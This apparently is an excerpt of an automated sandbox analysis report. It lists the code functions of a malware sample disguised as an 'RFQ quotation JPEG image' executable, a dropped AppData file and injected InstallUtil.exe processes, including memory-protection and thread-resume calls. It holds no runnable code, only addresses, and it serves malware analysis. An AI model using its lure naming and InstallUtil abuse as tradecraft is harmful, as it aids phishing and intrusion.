                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064F2A29 NtResumeThread,0_2_064F2A29
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A914F8 NtProtectVirtualMemory,3_2_05A914F8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A92A30 NtResumeThread,3_2_05A92A30
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A914F0 NtProtectVirtualMemory,3_2_05A914F0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A92A29 NtResumeThread,3_2_05A92A29
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C414F8 NtProtectVirtualMemory,6_2_05C414F8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C42A30 NtResumeThread,6_2_05C42A30
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C414F0 NtProtectVirtualMemory,6_2_05C414F0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C42A29 NtResumeThread,6_2_05C42A29
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_063E00400_2_063E0040
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_063E001E0_2_063E001E
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_014120100_2_01412010
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_014123220_2_01412322
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_01410A580_2_01410A58
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_01410D210_2_01410D21
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0141D2D00_2_0141D2D0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_014116C50_2_014116C5
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_014120B10_2_014120B1
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_01410D6A0_2_01410D6A
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_01410DE10_2_01410DE1
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_01418F2B0_2_01418F2B
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_01418F380_2_01418F38
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_014112F60_2_014112F6
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_014117C60_2_014117C6
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064FDB900_2_064FDB90
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064FD0480_2_064FD048
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064F566E0_2_064F566E
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064FDE8D0_2_064FDE8D
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064F54180_2_064F5418
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064F54280_2_064F5428
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064FDB810_2_064FDB81
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064FD0380_2_064FD038
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064FB1420_2_064FB142
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064FB1500_2_064FB150
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06504C380_2_06504C38
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0650A4F00_2_0650A4F0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0650A5480_2_0650A548
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0650E1B00_2_0650E1B0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0650A5380_2_0650A538
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0650E1A10_2_0650E1A1
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06547FB80_2_06547FB8
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0654C1000_2_0654C100
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06548EC00_2_06548EC0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06548EB00_2_06548EB0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06547FA90_2_06547FA9
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0654C4270_2_0654C427
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0654D2F80_2_0654D2F8
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_065400060_2_06540006
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_065B1F900_2_065B1F90
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_065B1F810_2_065B1F81
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_065C00400_2_065C0040
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_065C00330_2_065C0033
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0684DBE80_2_0684DBE8
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0684CF380_2_0684CF38
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_068300070_2_06830007
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_068300400_2_06830040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D61202_2_014D6120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DC1A02_2_014DC1A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DF0172_2_014DF017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DB3382_2_014DB338
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DC4802_2_014DC480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D67482_2_014D6748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DC7622_2_014DC762
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DB7E22_2_014DB7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D46D92_2_014D46D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D98682_2_014D9868
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DCA422_2_014DCA42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DBE972_2_014DBE97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D35722_2_014D3572
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DB5022_2_014DB502
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DE5272_2_014DE527
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DE5382_2_014DE538
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014DBEC02_2_014DBEC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685B6E82_2_0685B6E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068586082_2_06858608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685AA582_2_0685AA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685D6702_2_0685D670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685C3882_2_0685C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06858BED2_2_06858BED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685B0A02_2_0685B0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685A4082_2_0685A408
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685D0282_2_0685D028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068511A02_2_068511A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685C9D82_2_0685C9D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685BD382_2_0685BD38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06855EB82_2_06855EB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06855EC82_2_06855EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685B6D92_2_0685B6D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685560A2_2_0685560A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068556182_2_06855618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685AA482_2_0685AA48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06855A602_2_06855A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685D6632_2_0685D663
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06855A702_2_06855A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068533A82_2_068533A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068533B82_2_068533B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06856BC12_2_06856BC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06856BD02_2_06856BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685A3F82_2_0685A3F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068563122_2_06856312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068563202_2_06856320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068537302_2_06853730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685676A2_2_0685676A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068567782_2_06856778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685C3782_2_0685C378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685B08F2_2_0685B08F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068504882_2_06850488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068574972_2_06857497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068504982_2_06850498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068574A82_2_068574A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068508E02_2_068508E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068508F02_2_068508F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068578F02_2_068578F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068500072_2_06850007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068528072_2_06852807
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068528182_2_06852818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685D0182_2_0685D018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068544302_2_06854430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068500402_2_06850040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068570402_2_06857040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068570502_2_06857050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685518A2_2_0685518A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068511912_2_06851191
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068551982_2_06855198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068581A02_2_068581A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068581B02_2_068581B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685C9C82_2_0685C9C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068585FC2_2_068585FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_068579002_2_06857900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0685BD282_2_0685BD28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06850D392_2_06850D39
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06850D482_2_06850D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06857D482_2_06857D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06857D582_2_06857D58
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022123223_2_02212322
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022120103_2_02212010
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02210A583_2_02210A58
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02210D213_2_02210D21
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0221D2D03_2_0221D2D0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022116C53_2_022116C5
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022120B13_2_022120B1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02218F2B3_2_02218F2B
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02218F383_2_02218F38
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02210D6A3_2_02210D6A
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_02210DE13_2_02210DE1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022112F63_2_022112F6
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_022117C63_2_022117C6
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598142C3_2_0598142C
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598C0483_2_0598C048
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059800403_2_05980040
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059845D83_2_059845D8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059845CA3_2_059845CA
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059856E03_2_059856E0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_059800063_2_05980006
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598C03A3_2_0598C03A
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598ABB13_2_0598ABB1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_0598ABC03_2_0598ABC0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9CC883_2_05A9CC88
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9C1403_2_05A9C140
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A954283_2_05A95428
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A954183_2_05A95418
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9CC793_2_05A9CC79
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9CF853_2_05A9CF85
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9566E3_2_05A9566E
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9C1313_2_05A9C131
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AAE1B03_2_05AAE1B0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AAA5483_2_05AAA548
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AA4C383_2_05AA4C38
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AAE1A13_2_05AAE1A1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AAA5383_2_05AAA538
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AABB4F3_2_05AABB4F
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AD08533_2_05AD0853
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE7FB83_2_05AE7FB8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AEC1003_2_05AEC100
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AEC4273_2_05AEC427
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE7FA93_2_05AE7FA9
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE8EB03_2_05AE8EB0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE8EC03_2_05AE8EC0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE00063_2_05AE0006
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AED2F83_2_05AED2F8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05B600063_2_05B60006
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05B600403_2_05B60040
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05DEDBE83_2_05DEDBE8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05DD00403_2_05DD0040
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05DD00073_2_05DD0007
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05DECF383_2_05DECF38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010F61085_2_010F6108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FC1905_2_010FC190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FF0075_2_010FF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FB3285_2_010FB328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FC4705_2_010FC470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010F67305_2_010F6730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FC7525_2_010FC752
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010F97E85_2_010F97E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FBBD25_2_010FBBD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FCA325_2_010FCA32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010F4AD95_2_010F4AD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FBEB05_2_010FBEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FE5175_2_010FE517
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FE5285_2_010FE528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FB4F25_2_010FB4F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068184605_2_06818460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06817D905_2_06817D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068100405_2_06810040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068138705_2_06813870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068111C05_2_068111C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681CEEB5_2_0681CEEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681CEF85_2_0681CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681F6005_2_0681F600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681F6105_2_0681F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681C6385_2_0681C638
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681C6485_2_0681C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681D7985_2_0681D798
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681D7A85_2_0681D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068104905_2_06810490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068104A05_2_068104A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E4A05_2_0681E4A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E4B05_2_0681E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681B4D75_2_0681B4D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681B4E85_2_0681B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681DC005_2_0681DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681BD885_2_0681BD88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681BD985_2_0681BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06810D515_2_06810D51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681ED505_2_0681ED50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06810D605_2_06810D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681ED605_2_0681ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681CAA05_2_0681CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681FA595_2_0681FA59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681FA685_2_0681FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068173D85_2_068173D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068173E85_2_068173E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681DBF15_2_0681DBF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681D3405_2_0681D340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681D3505_2_0681D350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068108F05_2_068108F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E8F85_2_0681E8F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068100075_2_06810007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E04B5_2_0681E04B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E0585_2_0681E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068138605_2_06813860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681F1A95_2_0681F1A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068111B05_2_068111B0
